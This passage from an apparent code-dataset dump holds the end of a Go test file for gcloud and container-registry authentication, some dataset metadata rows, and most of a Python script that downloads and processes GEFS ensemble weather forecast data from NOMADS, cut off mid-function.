wantPrefix: "failed to parse gcloud token expiry:",
}}
for _, tc := range cases {
t.Run(tc.env, func(t *testing.T) {
GetGcloudCmd = newGcloudCmdMock(tc.env)
if _, err := NewGcloudAuthenticator(); err == nil {
t.Errorf("wanted error, got nil")
} else if got := err.Error(); !strings.HasPrefix(got, tc.wantPrefix) {
t.Errorf("wanted error prefix %q, got %q", tc.wantPrefix, got)
}
})
}
}
func TestGcloudSuccess(t *testing.T) {
// Stupid coverage to make sure it doesn't panic.
var b bytes.Buffer
logs.Debug.SetOutput(&b)
GetGcloudCmd = newGcloudCmdMock("success")
auth, err := NewGcloudAuthenticator()
if err != nil {
t.Fatalf("NewGcloudAuthenticator got error %v", err)
}
token, err := auth.Authorization()
if err != nil {
t.Fatalf("Authorization got error %v", err)
}
if got, want := token.Password, "mytoken"; got != want {
t.Errorf("wanted token %q, got %q", want, got)
}
}
//
// Keychain tests are in here so we can reuse the fake gcloud stuff.
//
func mustRegistry(r string) name.Registry {
reg, err := name.NewRegistry(r, name.StrictValidation)
if err != nil {
panic(err)
}
return reg
}
func TestKeychainDockerHub(t *testing.T) {
if auth, err := Keychain.Resolve(mustRegistry("index.docker.io")); err != nil {
t.Errorf("expected success, got: %v", err)
} else if auth != authn.Anonymous {
t.Errorf("expected anonymous, got: %v", auth)
}
}
func TestKeychainGCRandAR(t *testing.T) {
cases := []struct {
host string
expectAuth bool
}{
// GCR hosts
{"gcr.io", true},
{"us.gcr.io", true},
{"eu.gcr.io", true},
{"asia.gcr.io", true},
{"staging-k8s.gcr.io", true},
{"global.gcr.io", true},
{"notgcr.io", false},
{"fake-gcr.io", false},
{"alsonot.gcr.iot", false},
// AR hosts
{"us-docker.pkg.dev", true},
{"asia-docker.pkg.dev", true},
{"europe-docker.pkg.dev", true},
{"us-central1-docker.pkg.dev", true},
{"us-docker-pkg.dev", false},
{"someotherpkg.dev", false},
{"looks-like-pkg.dev", false},
{"closeto.pkg.devops", false},
}
// Env should fail.
if err := os.Setenv("GOOGLE_APPLICATION_CREDENTIALS", "/dev/null"); err != nil {
t.Fatalf("unexpected err os.Setenv: %v", err)
}
for i, tc := range cases {
t.Run(fmt.Sprintf("cases[%d]", i), func(t *testing.T) {
// Reset the keychain to ensure we don't cache earlier results.
Keychain = &googleKeychain{}
// Gcloud should succeed.
GetGcloudCmd = newGcloudCmdMock("success")
if auth, err := Keychain.Resolve(mustRegistry(tc.host)); err != nil {
t.Errorf("expected success for %v, got: %v", tc.host, err)
} else if tc.expectAuth && auth == authn.Anonymous {
t.Errorf("expected not anonymous auth for %v, got: %v", tc, auth)
} else if !tc.expectAuth && auth != authn.Anonymous {
t.Errorf("expected anonymous auth for %v, got: %v", tc, auth)
}
// Make gcloud fail to test that caching works.
GetGcloudCmd = newGcloudCmdMock("badoutput")
if auth, err := Keychain.Resolve(mustRegistry(tc.host)); err != nil {
t.Errorf("expected success for %v, got: %v", tc.host, err)
} else if tc.expectAuth && auth == authn.Anonymous {
t.Errorf("expected not anonymous auth for %v, got: %v", tc, auth)
} else if !tc.expectAuth && auth != authn.Anonymous {
t.Errorf("expected anonymous auth for %v, got: %v", tc, auth)
}
})
}
}
func TestKeychainError(t *testing.T) {
if err := os.Setenv("GOOGLE_APPLICATION_CREDENTIALS", "/dev/null"); err != nil {
t.Fatalf("unexpected err os.Setenv: %v", err)
}
GetGcloudCmd = newGcloudCmdMock("badoutput")
// Reset the keychain to ensure we don't cache earlier results.
Keychain = &googleKeychain{}
if _, err := Keychain.Resolve(mustRegistry("gcr.io")); err == nil {
t.Fatalf("expected err, got: %v", err)
}
}
type badSource struct{}
func (bs badSource) Token() (*oauth2.Token, error) {
return nil, fmt.Errorf("oops")
}
// This test is silly, but coverage.
func TestTokenSourceAuthError(t *testing.T) {
auth := tokenSourceAuth{badSource{}}
_, err := auth.Authorization()
if err == nil {
t.Errorf("expected err, got nil")
}
}
func TestNewEnvAuthenticatorFailure(t *testing.T) {
if err := os.Setenv("GOOGLE_APPLICATION_CREDENTIALS", "/dev/null"); err != nil {
t.Fatalf("unexpected err os.Setenv: %v", err)
}
// Expect error.
_, err := NewEnvAuthenticator()
if err == nil {
t.Errorf("expected err, got nil")
}
}
|
[
"\"GO_TEST_MODE\""
] |
[] |
[
"GO_TEST_MODE"
] |
[]
|
["GO_TEST_MODE"]
|
go
| 1 | 0 | |
gefs/door_downloader_nwp_gefs_nomads.py
|
#!/usr/bin/python3
"""
HyDE Downloading Tool - NWP GEFS 0.25
__date__ = '20210914'
__version__ = '1.0.0'
__author__ =
        'Andrea Libertino ([email protected])',
        'Fabio Delogu ([email protected])',
__library__ = 'HyDE'
General command line:
python3 hyde_downloader_nwp_gefs_nomads.py -settings_file configuration.json -time YYYY-MM-DD HH:MM
Version(s):
20200227 (1.0.0) --> Beta release
"""
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Complete library
import logging
import os
import time
import json
import urllib.request
import tempfile
import xarray as xr
import numpy as np
import pandas as pd
from urllib.request import Request, urlopen
from urllib.error import URLError
from copy import deepcopy
from cdo import Cdo
from multiprocessing import Pool, cpu_count
from datetime import datetime
from os import makedirs
from os.path import join, exists, split
from argparse import ArgumentParser
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Algorithm information
alg_name = 'HYDE DOWNLOADING TOOL - NWP GEFS'
alg_version = '1.0.0'
alg_release = '2021-09-14'
# Algorithm parameter(s)
time_format = '%Y%m%d%H%M'
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Script Main
def main():
# -------------------------------------------------------------------------------------
# Get algorithm settings
alg_settings, alg_time = get_args()
# Set algorithm settings
data_settings = read_file_json(alg_settings)
# Set algorithm logging
make_folder(data_settings['data']['log']['folder'])
set_logging(logger_file=join(data_settings['data']['log']['folder'], data_settings['data']['log']['filename']))
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Info algorithm
logging.info(' ============================================================================ ')
logging.info(' ==> ' + alg_name + ' (Version: ' + alg_version + ' Release_Date: ' + alg_release + ')')
logging.info(' ==> START ... ')
logging.info(' ')
# Time algorithm information
start_time = time.time()
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Get algorithm time range
time_run, time_run_range = set_run_time(alg_time, data_settings['time'])
ens_members = np.arange(1,data_settings["algorithm"]["ancillary"]["ens_members"]+1)
# Starting info
logging.info(' --> TIME RUN: ' + str(time_run))
# Iterate over time steps
for time_run_step in time_run_range:
# Starting info
logging.info(' ---> NWP RUN: ' + str(time_run_step) + ' ... ')
# Iterate over ensemble members
for ens_member in ens_members:
# Starting info
logging.info(' ---> ENSEMBLE MEMBER: ' + str(ens_member).zfill(2) + ' ... ')
# Get data time range
time_data_range = set_data_time(time_run_step, data_settings['data']['dynamic']['time'])
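            # Full hourly time axis from one hour after the run time up to the last
            # forecast step; used later to reindex/pad the merged outcome dataset.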
time_data_full = pd.date_range(time_run + pd.Timedelta('1H'), time_data_range[-1], freq='1H')
# Set data sources
data_source = set_data_source(time_run_step, time_data_range, ens_member,
data_settings['data']['dynamic']['source'],
data_settings['data']['static']['bounding_box'],
data_settings['algorithm']['ancillary'],
data_settings['algorithm']['template'],
type_data=data_settings['algorithm']['ancillary']['type'],)
# Set data ancillary
data_ancillary = set_data_ancillary(time_run_step, time_data_range, ens_member,
data_settings['data']['dynamic']['ancillary'],
data_settings['data']['static']['bounding_box'],
data_settings['algorithm']['ancillary'],
data_settings['algorithm']['template'],
type_data=data_settings['algorithm']['ancillary']['type'],)
# Set data outcome global
data_outcome_global = set_data_outcome(
time_run_step, ens_member,
data_settings['data']['dynamic']['outcome']['global'],
data_settings['data']['static']['bounding_box'],
data_settings['algorithm']['ancillary'],
data_settings['algorithm']['template'],
type_data=data_settings['algorithm']['ancillary']['type'],
flag_updating=data_settings['algorithm']['flags']['cleaning_dynamic_data_global'])
# Set data outcome domain
data_outcome_domain = set_data_outcome(
time_run_step, ens_member,
data_settings['data']['dynamic']['outcome']['domain'],
data_settings['data']['static']['bounding_box'],
data_settings['algorithm']['ancillary'],
data_settings['algorithm']['template'],
type_data=data_settings['algorithm']['ancillary']['type'],
flag_updating=data_settings['algorithm']['flags']['cleaning_dynamic_data_domain'])
if data_settings['algorithm']['flags']['downloading_mp']:
retrieve_data_source_mp(
data_source, data_ancillary,
flag_updating=data_settings['algorithm']['flags']['cleaning_dynamic_data_ancillary'],
process_n=data_settings['algorithm']['ancillary']['process_mp'], limit=data_settings['algorithm']['ancillary']['remote_server_hit_per_min'])
else:
retrieve_data_source_seq(
data_source, data_ancillary,
flag_updating=data_settings['algorithm']['flags']['cleaning_dynamic_data_ancillary'], limit=data_settings['algorithm']['ancillary']['remote_server_hit_per_min'])
# Merge and mask data ancillary to data outcome
arrange_data_outcome(data_ancillary, data_outcome_global, data_outcome_domain,
data_bbox=data_settings['data']['static']['bounding_box'],
cdo_exec=data_settings['algorithm']['ancillary']['cdo_exec'],
cdo_deps=data_settings['algorithm']['ancillary']['cdo_deps'],
source_standards=data_settings['data']['dynamic']['source']['vars_standards'],
date_range=time_data_full)
# Clean data tmp (such as ancillary and outcome global)
clean_data_tmp(
data_ancillary, data_outcome_global,
flag_cleaning_tmp=data_settings['algorithm']['flags']['cleaning_dynamic_data_tmp'])
logging.info(' ---> ENSEMBLE MEMBER: ' + str(ens_member).zfill(2) + ' ... DONE')
# Ending info
logging.info(' ---> NWP RUN: ' + str(time_run_step) + ' ... DONE')
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Info algorithm
time_elapsed = round(time.time() - start_time, 1)
logging.info(' ')
logging.info(' ==> ' + alg_name + ' (Version: ' + alg_version + ' Release_Date: ' + alg_release + ')')
logging.info(' ==> TIME ELAPSED: ' + str(time_elapsed) + ' seconds')
logging.info(' ==> ... END')
logging.info(' ==> Bye, Bye')
logging.info(' ============================================================================ ')
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to check source url(s)
def check_url_source(src_data, src_code_exist=200, process_n=20, process_max=None):
logging.info(' ----> Checking source url(s) ... ')
if process_max is None:
process_max = cpu_count() - 1
if process_n > process_max:
        logging.warning(' ----> Number of processes must not exceed the recommended maximum of ' + str(process_max))
logging.warning(' ----> Set number of process from ' + str(process_n) + ' to ' + str(process_max))
process_n = process_max
src_response_list = []
src_key_list = []
for src_data_key, src_data_list in src_data.items():
logging.info(' -----> Source ' + src_data_key + ' ... ')
with Pool(processes=process_n, maxtasksperchild=1) as process_pool:
src_response = process_pool.map(request_url, src_data_list, chunksize=1)
process_pool.close()
process_pool.join()
src_response_list.append(src_response)
src_key_list.append(src_data_key)
logging.info(' -----> Source ' + src_data_key + ' ... DONE')
for src_key_step, src_response_step in zip(src_key_list, src_response_list):
if not all(src_code_el == src_code_exist for src_code_el in src_response_step):
logging.warning(' ===> Some url(s) for source ' + src_key_step + ' are not available!')
logging.info(' ----> Checking source url(s) ... FAILED')
return False
logging.info(' ----> Checking source url(s) ... DONE')
return True
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to request url
def request_url(src_url):
logging.getLogger('requests').setLevel(logging.CRITICAL)
src_request = Request(src_url)
try:
src_response = urlopen(src_request)
return src_response.code
except URLError as e:
if hasattr(e, 'reason'):
logging.warning(' ===> URL is unreachable from server.')
            logging.warning(' ===> URL: ' + src_url)
return False
elif hasattr(e, 'code'):
logging.warning(' ===> The server couldn\'t fulfill the request.')
            logging.warning(' ===> URL: ' + src_url)
return False
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to clean tmp data such as ancillary or global (if domain is set)
def clean_data_tmp(data_ancillary, data_outcome_global,
flag_cleaning_tmp=False):
if flag_cleaning_tmp:
for data_key, data_value in data_ancillary.items():
for data_step in data_value:
if os.path.exists(data_step):
os.remove(data_step)
for data_key, data_value in data_outcome_global.items():
for data_step in data_value:
if os.path.exists(data_step):
os.remove(data_step)
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to merge and mask outcome dataset(s)
def arrange_data_outcome(src_data, dst_data_global, dst_data_domain,
data_bbox=None, cdo_exec=None, cdo_deps=None, source_standards=None, date_range=None):
logging.info(' ----> Dumping data ... ')
if data_bbox is not None:
bbox_lon_right = str(data_bbox['lon_right'])
bbox_lon_left = str(data_bbox['lon_left'])
bbox_lat_top = str(data_bbox['lat_top'])
bbox_lat_bottom = str(data_bbox['lat_bottom'])
bbox_points = [bbox_lon_left, bbox_lon_right, bbox_lat_bottom, bbox_lat_top]
bbox_cdo = ','.join(bbox_points)
else:
bbox_cdo = None
if cdo_exec is None:
logging.error(' ===> CDO executable is not set!')
raise RuntimeError(' CDO executable is not set!')
for cdo_dep in cdo_deps:
        os.environ['LD_LIBRARY_PATH'] = os.environ.get('LD_LIBRARY_PATH', '') + ':' + cdo_dep
#temp for local debug
os.environ['PATH'] = os.environ['PATH'] + ':/home/andrea/FP_libs/fp_libs_cdo/cdo-1.9.8_nc-4.6.0_hdf-1.8.17_eccodes-2.17.0/bin/'
cdo = Cdo()
cdo.setCdo(cdo_exec)
for (src_key_step, src_data_step), \
(dst_key_global_step, dst_data_global_step), (dst_key_domain_step, dst_data_domain_step) in \
zip(src_data.items(), dst_data_global.items(), dst_data_domain.items()):
logging.info(' -----> Type ' + src_key_step + ' ... ')
src_data_step.sort()
if isinstance(dst_data_global_step, list):
dst_data_global_step = dst_data_global_step[0]
if isinstance(dst_data_domain_step, list):
dst_data_domain_step = dst_data_domain_step[0]
folder_data_global_step, filename_data_global_step = os.path.split(dst_data_global_step)
tmp_data_global_step_cat = create_filename_tmp(folder=folder_data_global_step, suffix='.grib2')
tmp_data_global_step_seltimestep = create_filename_tmp(folder=folder_data_global_step, suffix='.grib2')
tmp_data_global_step_convert = create_filename_tmp(folder=folder_data_global_step, suffix='.nc')
logging.info(' ------> Merge, convert and project data ... ')
if not os.path.exists(dst_data_global_step):
cdo.cat(input=src_data_step, output=tmp_data_global_step_cat, options='-r')
info_file = cdo.infov(input=tmp_data_global_step_cat)
            # Explore available variables in the grib file, skipping rows with headers and footers
var_in_all = [i.split(':')[-1].replace(' ','') for i in cdo.infov(input=tmp_data_global_step_cat) if i.split(':')[0].replace(' ','').isnumeric()]
var_in = np.unique(var_in_all)
logging.info(' ------> Var(s) found in file: ' + ','.join(var_in))
step_expected = int(src_data_step.__len__()*len(var_in))
step_get = len(var_in_all)
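            # If the concatenated GRIB holds more records per variable than forecast
            # steps, keep only every step_ratio-th timestep so one record per step remains.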
if step_get > step_expected:
step_ratio = int(step_get / step_expected)
var_select_cdo, timestep_select_cdo = select_time_steps(
info_file, id_start=step_ratio, id_end=step_get, id_period=step_ratio)
cdo.seltimestep(timestep_select_cdo, input=tmp_data_global_step_cat, output=tmp_data_global_step_seltimestep)
else:
if os.path.exists(tmp_data_global_step_seltimestep):
os.remove(tmp_data_global_step_seltimestep)
tmp_data_global_step_seltimestep = tmp_data_global_step_cat
cdo.copy(input=tmp_data_global_step_seltimestep, output=tmp_data_global_step_convert, options="-f nc4")
cdo.sellonlatbox('-180,180,-90,90', input=tmp_data_global_step_convert, output=dst_data_global_step)
if not source_standards == None:
if source_standards['convert2standard_continuum_format']:
out_file = deepcopy(xr.open_dataset(dst_data_global_step))
time_range_full = pd.date_range(min(out_file["time"].values),max(out_file["time"].values),freq='H')
os.remove(dst_data_global_step)
if '2t' in var_in.tolist():
if source_standards['source_temperature_mesurement_unit'] == 'C':
pass
elif source_standards['source_temperature_mesurement_unit'] == 'K':
logging.info(' ------> Convert temperature to C ... ')
#out_file = deepcopy(xr.open_dataset(dst_data_global_step))
out_file['2t_C'] = out_file['2t'] - 273.15
out_file['2t_C'].attrs['long_name'] = '2 metre temperature'
out_file['2t_C'].attrs['units'] = 'C'
out_file['2t_C'].attrs['standard_name'] = "air_temperature"
out_file = out_file.rename({'2t': '2t_K'})
#out_file.to_netcdf(dst_data_global_step)
logging.info(' ------> Convert temperature to C ... DONE')
else:
raise NotImplementedError
if 'tp' in var_in.tolist() and source_standards['source_precipitation_is_cumulated'] is True:
logging.info(' ------> Decumulate precipitation ... ')
#out_file = deepcopy(xr.open_dataset(dst_data_global_step))
#os.remove(dst_data_global_step)
temp = np.diff(out_file['tp'].values, n=1, axis=0, prepend=0)
out_file['tp'][np.arange(2,out_file['tp'].values.shape[0],2),:,:].values = temp[np.arange(2,out_file['tp'].values.shape[0],2),:,:]
out_file['tp'].values = out_file['tp'].values/3
out_file['tp'].attrs['long_name'] = 'hourly precipitation depth'
out_file['tp'].attrs['units'] = 'mm'
out_file['tp'].attrs['standard_name'] = "precipitation"
#out_file.to_netcdf(dst_data_global_step)
logging.info(' ------> Decumulate precipitation ... DONE')
if '10u' in var_in.tolist() and source_standards['source_wind_separate_components'] is True:
logging.info(' ------> Combine wind component ... ')
#out_file = deepcopy(xr.open_dataset(dst_data_global_step))
#os.remove(dst_data_global_step)
out_file['10wind'] = np.sqrt(out_file['10u']**2 + out_file['10v']**2)
out_file['10wind'].attrs['long_name'] = '10 m wind'
out_file['10wind'].attrs['units'] = 'm s**-1'
out_file['10wind'].attrs['standard_name'] = "wind"
#out_file.to_netcdf(dst_data_global_step)
logging.info(' ------> Combine wind component ... DONE')
# out_file = deepcopy(xr.open_dataset(dst_data_global_step))
# os.remove(dst_data_global_step)
# Check if file has "heigth" dimension and remove it
try:
out_file = out_file.squeeze(dim="height", drop=True)
out_file = out_file.squeeze(dim="height_2", drop=True)
logging.info(' ------> Remove height dimensions ... ')
except:
pass
# Reindex time axis by padding last available map over the time range
out_file=out_file.reindex(time=date_range, method='nearest')
out_file.to_netcdf(dst_data_global_step)
if os.path.exists(tmp_data_global_step_cat):
os.remove(tmp_data_global_step_cat)
if os.path.exists(tmp_data_global_step_seltimestep):
os.remove(tmp_data_global_step_seltimestep)
if os.path.exists(tmp_data_global_step_convert):
os.remove(tmp_data_global_step_convert)
logging.info(' ------> Merge, convert and project data ... DONE')
else:
logging.info(' ------> Merge, convert and project data ... SKIPPED. Data already merged.')
logging.info(' ------> Mask data over domain ... ')
if not os.path.exists(dst_data_domain_step):
if bbox_cdo is not None:
cdo.sellonlatbox(bbox_cdo, input=dst_data_global_step, output=dst_data_domain_step)
logging.info(' ------> Mask data over domain ... DONE')
else:
logging.info(' ------> Mask data over domain ... SKIPPED. Domain bounding box not defined.')
else:
logging.info(' ------> Mask data over domain ... SKIPPED. Data already masked.')
logging.info(' -----> Type ' + src_key_step + ' ... DONE')
logging.info(' ----> Dumping data ... DONE')
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to drop data
def select_time_steps(info_file, id_start=2, id_end=None, id_period=2):
if id_end is None:
id_end = int(info_file[-1].split()[0])
list_vars = []
for info_row in info_file[:-1]:
info_list = info_row.split()
info_id = int(info_list[0])
info_var = info_list[12]
if info_id >= 0:
list_vars.append(info_var)
var_box = list(set(list_vars))
ids_info = [str(id_start), str(id_end), str(id_period)]
ids_box = '/'.join(ids_info)
return var_box, ids_box
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to create a tmp name
def create_filename_tmp(prefix='gfs_tmp_', suffix='.grib2', folder=None):
if folder is None:
folder = '/tmp'
with tempfile.NamedTemporaryFile(dir=folder, prefix=prefix, suffix=suffix, delete=False) as tmp:
temp_file_name = tmp.name
return temp_file_name
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to retrieve and store data (multiprocess)
def retrieve_data_source_mp(src_data, dst_data, flag_updating=False, process_n=20, process_max=None, limit=9999):
logging.info(' ----> Downloading data in multiprocessing mode ... ')
if process_max is None:
process_max = cpu_count() - 1
if process_n > process_max:
        logging.warning(' ----> Number of processes must not exceed the recommended maximum of ' + str(process_max))
logging.warning(' ----> Set number of process from ' + str(process_n) + ' to ' + str(process_max))
process_n = process_max
data_list = []
data_check = []
for (src_data_key, src_data_list), (dst_data_key, dst_data_list) in zip(src_data.items(), dst_data.items()):
for src_step_url, dst_step_path in zip(src_data_list, dst_data_list):
dst_step_root, dst_step_file = split(dst_step_path)
make_folder(dst_step_root)
if exists(dst_step_path) and flag_updating:
flag_updating = True
elif (not exists(dst_step_path)) and flag_updating:
flag_updating = True
elif (not exists(dst_step_path)) and (not flag_updating):
flag_updating = True
if flag_updating:
data_list.append([src_step_url, dst_step_path])
data_check.append([src_step_url, dst_step_path])
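    # Respect the remote server hit limit: send at most `limit` requests per batch,
    # pausing 60 seconds between consecutive batches.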
if len(data_list)>limit:
for i in range(0,len(data_list),limit):
max_available = min(i + limit, len(data_list))
chunk = data_list[i:i + limit]
with Pool(processes=process_n, maxtasksperchild=1) as process_pool:
_ = process_pool.map(request_data_source, chunk, chunksize=1)
process_pool.close()
process_pool.join()
logging.info(' ----> Wait 60 seconds for next requests ...')
time.sleep(60)
if max_available<len(data_list):
logging.info(' ----> ' + str(int(100*max_available/len(data_list))) + ' % complete...')
logging.info(' ----> Continue with next chunk of requests...')
else:
with Pool(processes=process_n, maxtasksperchild=1) as process_pool:
_ = process_pool.map(request_data_source, data_list, chunksize=1)
process_pool.close()
process_pool.join()
find_data_corrupted(data_check)
logging.info(' ----> Downloading data in multiprocessing mode ... DONE')
# -------------------------------------------------------------------------------------
# ------------------------------------------------------------------------------------
# Method to find outliers and to retry for downloading data again
def find_data_corrupted(data_list, data_perc_min=5, data_size_min=100000):
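    # Heuristic: files that are missing, or smaller than both data_size_min bytes and
    # the data_perc_min-th percentile of all downloaded sizes, are downloaded again.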
logging.info(' -----> Checking for corrupted or unavailable data ... ')
data_size = []
idx_nodata = []
for dst_id, dst_step_path in enumerate(data_list):
if os.path.exists(dst_step_path[1]):
dst_step_size = os.path.getsize(dst_step_path[1])
else:
dst_step_size = 0
idx_nodata.append(dst_id)
data_size.append(dst_step_size)
data_size = np.asarray(data_size)
data_p_min = np.percentile(data_size, data_perc_min)
idx_false = np.where(data_size < min([data_size_min, data_p_min]))[0]
idx_nodata = np.asarray(idx_nodata, int)
idx_retry = np.unique(np.concatenate((idx_false, idx_nodata), axis=0))
for idx_step in idx_retry:
data_false = data_list[idx_step]
if os.path.exists(data_false[1]):
os.remove(data_false[1])
logging.info(' ------> Downloading data ' + split(data_false[1])[1] + ' ... ')
request_data_source(data_false)
logging.info(' ------> Downloading data ' + split(data_false[1])[1] + ' ... DONE')
logging.info(' -----> Checking for corrupted or unavailable data ... DONE')
# ------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to request data using a source url and a destination filename
def request_data_source(data_list):
logging.info(' :: Http request for downloading: ' + data_list[0] + ' ... ')
logging.info(' :: Outcome data will be dumped in: ' + split(data_list[1])[1] + ' ... ')
try:
urllib.request.urlretrieve(data_list[0], filename=data_list[1])
logging.info(' :: Outcome data will be dumped in: ' + split(data_list[1])[1] + ' ... DONE')
logging.info(' :: Http request for downloading: ' + data_list[0] + ' ... DONE')
return True
except IOError:
logging.warning(' :: Outcome data will be dumped in: ' + split(data_list[1])[1] + ' ... FAILED')
logging.error(' :: Http request for downloading: ' + data_list[0] + ' ... FAILED. IO error.')
raise IOError(' :: Http request for downloading: ' + data_list[0] + ' ... FAILED. Data Not available on the server.')
except ConnectionResetError:
logging.warning(' :: Outcome data will be dumped in: ' + split(data_list[1])[1] + ' ... FAILED')
logging.error(' :: Http request for downloading: ' + data_list[0] + ' ... FAILED. Connection Reset error')
raise ConnectionResetError(' :: Http request for downloading: ' + data_list[0] + ' ... FAILED. Connection Reset error')
except ConnectionAbortedError:
logging.warning(' :: Outcome data will be dumped in: ' + split(data_list[1])[1] + ' ... FAILED')
        logging.error(' :: Http request for downloading: ' + data_list[0] + ' ... FAILED. Connection Aborted error.')
        raise ConnectionAbortedError(' :: Http request for downloading: ' + data_list[0] + ' ... FAILED. Connection Aborted error.')
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to retrieve and store data (sequential)
def retrieve_data_source_seq(src_data, dst_data, flag_updating=False, limit=9999):
logging.info(' ----> Downloading data in sequential mode ... ')
data_list = []
data_check = []
hit_count = 0
for (src_data_key, src_data_list), (dst_data_key, dst_data_list) in zip(src_data.items(), dst_data.items()):
logging.info(' -----> DataType: ' + src_data_key + ' ... ')
for src_step_url, dst_step_path in zip(src_data_list, dst_data_list):
dst_step_root, dst_step_file = split(dst_step_path)
make_folder(dst_step_root)
logging.info(' ------> Save data in file: ' + str(dst_step_file) + ' ... ')
if exists(dst_step_path) and flag_updating:
flag_updating = True
elif (not exists(dst_step_path)) and flag_updating:
flag_updating = True
elif (not exists(dst_step_path)) and (not flag_updating):
flag_updating = True
if flag_updating:
request_data_source([src_step_url, dst_step_path])
hit_count += 1
data_list.append([src_step_url, dst_step_path])
                logging.info(' ------> Save data in file: ' + str(dst_step_file) + ' ... DONE')
if hit_count == limit:
logging.info(' ----> Wait 60 seconds for next requests ...')
time.sleep(60)
hit_count = 0
logging.info(' ----> Continue with next chunk of requests...')
else:
logging.info(' ------> Save data in file: ' + str(dst_step_file) +
' ... SKIPPED. File saved previously')
data_check.append([src_step_url, dst_step_path])
logging.info(' -----> DataType: ' + src_data_key + ' ... DONE')
find_data_corrupted(data_check)
logging.info(' ----> Downloading data in sequential mode ... DONE')
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to create data outcome list
def set_data_outcome(time_run, ens_member_num, data_def, geo_def, ancillary_def, tags_template,
type_data=None, flag_updating=True):
if type_data is None:
type_data = ["surface"]
folder_list = data_def['folder']
filename_list = data_def['filename']
lon_right = geo_def['lon_right']
lon_left = geo_def['lon_left']
lat_top = geo_def['lat_top']
lat_bottom = geo_def['lat_bottom']
domain = ancillary_def['domain']
ens_member = str(ens_member_num).zfill(2)
hour_run = time_run.hour
datetime_run = time_run.to_pydatetime()
file_ws = {}
for folder_raw, filename_raw, type_step in zip(folder_list, filename_list, type_data):
file_list = []
tags_values_step = {"domain": domain,
"outcome_sub_path_time": datetime_run, "outcome_datetime": datetime_run,
"run_hour": hour_run, "run_step": 0,
"run_datetime": datetime_run,
"run_lon_right": str(lon_right),
"run_lon_left": str(lon_left),
"run_lat_bottom": str(lat_bottom),
"run_lat_top": str(lat_top),
"ens_member" : ens_member}
folder_step = fill_tags2string(folder_raw, tags_template, tags_values_step)
filename_step = fill_tags2string(filename_raw, tags_template, tags_values_step)
path_step = join(folder_step, filename_step)
if flag_updating:
if os.path.exists(path_step):
os.remove(path_step)
if not os.path.exists(folder_step):
make_folder(folder_step)
file_list.append(path_step)
file_ws[type_step] = file_list
return file_ws
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to create data ancillary list
def set_data_ancillary(time_run, time_range, ens_member_num, data_def, geo_def, ancillary_def, tags_template,
type_data=None, anl_include=False):
if type_data is None:
type_data = ["surface"]
folder_list = data_def['folder']
filename_list = data_def['filename']
lon_right = geo_def['lon_right']
lon_left = geo_def['lon_left']
lat_top = geo_def['lat_top']
lat_bottom = geo_def['lat_bottom']
domain = ancillary_def['domain']
ens_member = str(ens_member_num).zfill(2)
hour_run = time_run.hour
datetime_run = time_run.to_pydatetime()
file_ws = {}
for folder_raw, filename_raw, type_step in zip(folder_list, filename_list, type_data):
file_list = []
for time_id, time_step in enumerate(time_range):
if not anl_include:
time_id = time_id + 1
datetime_step = time_step.to_pydatetime()
tags_values_step = {"domain": domain,
"ancillary_sub_path_time": datetime_run, "ancillary_datetime": datetime_step,
"run_hour": hour_run, "run_step": time_id,
"run_datetime": datetime_run,
"run_lon_right": str(lon_right),
"run_lon_left": str(lon_left),
"run_lat_bottom": str(lat_bottom),
"run_lat_top": str(lat_top),
"ens_member": ens_member}
folder_step = fill_tags2string(folder_raw, tags_template, tags_values_step)
filename_step = fill_tags2string(filename_raw, tags_template, tags_values_step)
path_step = join(folder_step, filename_step)
file_list.append(path_step)
file_ws[type_step] = file_list
return file_ws
# -------------------------------------------------------------------------------------
# -------------------------------------------------------------------------------------
# Method to create data source list
def set_data_source(time_run, time_range, ens_member_num, data_def, geo_def, ancillary_def, tags_template,
type_data=None, anl_include=False):
if type_data is None:
type_data = ["surface"]
url_root_list = data_def['url_root']
url_file_list = data_def['url_file']
url_lev_list = data_def['url_lev']
url_vars_list = data_def['url_vars']
url_bbox_list = data_def['url_bbox']
url_loc_list = data_def['url_loc']
lon_right = geo_def['lon_right']
lon_left = geo_def['lon_left']
lat_top = geo_def['lat_top']
lat_bottom = geo_def['lat_bottom']
domain = ancillary_def['domain']
ens_member = str(ens_member_num).zfill(2)
frc_steps = (time_range - time_run).total_seconds()/3600
hour_run = time_run.hour
datetime_run = time_run.to_pydatetime()
url_ws = {}
for url_root_raw, url_file_raw, url_lev_raw, url_vars_raw, url_bbox_raw, url_loc_raw, type_step in zip(
url_root_list, url_file_list, url_lev_list, url_vars_list, url_bbox_list, url_loc_list, type_data):
if url_bbox_raw is None:
url_bbox_raw = ''
url_list = []
for time_id, time_step in zip(frc_steps, time_range):
datetime_step = time_step.to_pydatetime()
tags_values_step = {"domain": domain,
"outcome_sub_path_time": datetime_run, "outcome_datetime": datetime_step,
"run_hour": hour_run, "run_step": int(time_id),
"run_datetime": datetime_run,
"run_lon_right": str(lon_right),
"run_lon_left": str(lon_left),
"run_lat_bottom": str(lat_bottom),
"run_lat_top": str(lat_top),
"ens_member": ens_member}
url_root_step = fill_tags2string(url_root_raw, tags_template, tags_values_step)
url_file_step = fill_tags2string(url_file_raw, tags_template, tags_values_step)
url_lev_step = fill_tags2string(url_lev_raw, tags_template, tags_values_step)
url_vars_step = fill_tags2string(url_vars_raw, tags_template, tags_values_step)
url_bbox_step = fill_tags2string(url_bbox_raw, tags_template, tags_values_step)
